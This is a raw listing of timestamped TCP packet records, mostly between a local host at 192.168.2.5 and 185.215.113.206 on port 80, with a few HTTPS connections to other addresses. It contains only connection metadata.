Nov 12, 2024 00:06:26.765945911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765955925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765974045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765981913 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765985966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765997887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766000032 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766010046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766019106 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766021967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766033888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766045094 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766052961 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766062021 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766072989 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766074896 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766084909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766093016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766097069 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766108990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766118050 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766122103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766133070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766149998 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766153097 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766163111 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766168118 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766175032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766196012 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766215086 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766803980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766815901 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766825914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766838074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766849041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766858101 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766860962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766872883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766890049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766897917 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766904116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766913891 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766916037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766930103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766941071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766951084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766952038 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766963005 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766973972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766982079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.766990900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.766994953 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767004013 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767014027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767019033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767035007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767050982 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767052889 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767076969 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767076969 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767091036 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767100096 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767105103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767116070 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767117023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767129898 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767132998 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767143011 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767155886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767158031 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767170906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767178059 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767184019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767203093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767214060 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767221928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767234087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767241955 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767257929 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767270088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767278910 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767280102 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767292976 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767298937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767306089 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767326117 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767328978 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767339945 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767340899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767354012 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767365932 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767365932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767378092 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767395973 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767406940 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767416954 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767420053 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767429113 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767441034 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767450094 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767452002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767463923 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767463923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.767488003 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.767509937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.768136024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768193960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.768210888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768223047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768233061 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768244028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768249035 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.768258095 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768275023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768276930 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.768286943 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768296957 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.768299103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768306017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768311024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768316031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768321991 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.768321991 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.768362045 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.769512892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.769560099 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.769568920 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.769654036 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.818144083 CET	49840	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:26.818190098 CET	443	49840	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:26.818321943 CET	49840	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:26.818581104 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:26.818639040 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:26.818694115 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:26.818871975 CET	49840	443	192.168.2.5	108.139.47.33
Nov 12, 2024 00:06:26.818886995 CET	443	49840	108.139.47.33	192.168.2.5
Nov 12, 2024 00:06:26.819508076 CET	49841	443	192.168.2.5	20.75.60.91
Nov 12, 2024 00:06:26.819530964 CET	443	49841	20.75.60.91	192.168.2.5
Nov 12, 2024 00:06:26.843048096 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843065977 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843076944 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843087912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843096972 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843132019 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843149900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843161106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843170881 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843180895 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843189955 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843193054 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843202114 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843209982 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843213081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843225956 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843242884 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843385935 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843401909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843414068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843424082 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843436956 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843442917 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843453884 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843455076 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843472004 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843475103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843485117 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843494892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843497038 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843506098 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843513966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843518019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843529940 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843533993 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843548059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843558073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843568087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843578100 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843586922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843597889 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843606949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843620062 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843622923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843633890 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843641996 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843645096 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843657017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843661070 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843667984 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843679905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843683004 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843692064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843699932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843703032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843714952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843720913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843724966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843727112 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843735933 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843751907 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843758106 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843767881 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843772888 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843780041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843791962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843799114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843803883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843815088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843831062 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843832970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843844891 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843851089 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843856096 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843866110 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843866110 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843878984 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843889952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843892097 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843900919 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843911886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843921900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843921900 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843934059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843935966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843945980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843956947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843960047 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843969107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843980074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.843986034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.843992949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.844002008 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.844027996 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.846376896 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:26.846399069 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:26.846465111 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:26.846631050 CET	49842	443	192.168.2.5	13.107.246.40
Nov 12, 2024 00:06:26.846643925 CET	443	49842	13.107.246.40	192.168.2.5
Nov 12, 2024 00:06:26.874696970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874716997 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874727964 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874772072 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.874811888 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.874872923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874883890 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874893904 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874911070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874918938 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.874923944 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874934912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874946117 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.874948978 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874962091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874964952 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.874974012 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.874989986 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.874994040 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875015974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875015974 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875030041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875039101 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875046968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875061989 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875062943 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875072956 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875082016 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875086069 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875097990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875107050 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875109911 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875118971 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875130892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875132084 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875144958 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875150919 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875171900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875174999 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875185013 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875200033 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875204086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875217915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875226021 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875230074 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875241041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875252962 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875257015 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875267982 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875272989 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875279903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875291109 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875294924 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875302076 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875328064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875332117 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875338078 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875340939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875354052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875365973 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875365973 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875380039 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875380993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875392914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875397921 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875405073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875416994 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875421047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875416994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875428915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875436068 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875461102 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875471115 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875473022 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875483990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875495911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875499010 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875508070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875519037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875523090 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875531912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875544071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875555992 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875560999 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875564098 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875572920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875586987 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875592947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875603914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875611067 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875612974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875627995 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875634909 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875638962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875650883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875663996 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875667095 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875679016 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875683069 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875689983 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.875691891 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875705004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.875714064 CET	49758	80	192.168.2.5	185.215.113.206
